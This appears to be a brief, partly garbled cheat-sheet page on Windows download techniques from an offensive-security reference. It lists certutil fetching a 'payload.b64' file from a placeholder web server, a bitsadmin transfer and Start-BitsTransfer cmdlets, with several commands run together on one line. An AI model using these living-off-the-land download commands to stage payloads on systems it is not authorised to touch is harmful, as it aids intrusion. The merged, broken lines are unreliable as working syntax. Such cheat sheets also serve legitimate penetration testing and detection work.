PowerShell Web Downloads
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64bitsadmin /transfer transfName /priority high http://example.com/examplefile.pdf C:\downloads\examplefile.pdfBitsTransfer
Import-Module BitsTransferStart-BitsTransfer -Source $url -Destination $output
#OR
Start-BitsTransfer -Source $url -Destination $output -AsynchronousOther
PowerShell DownloadFile Method
Last updated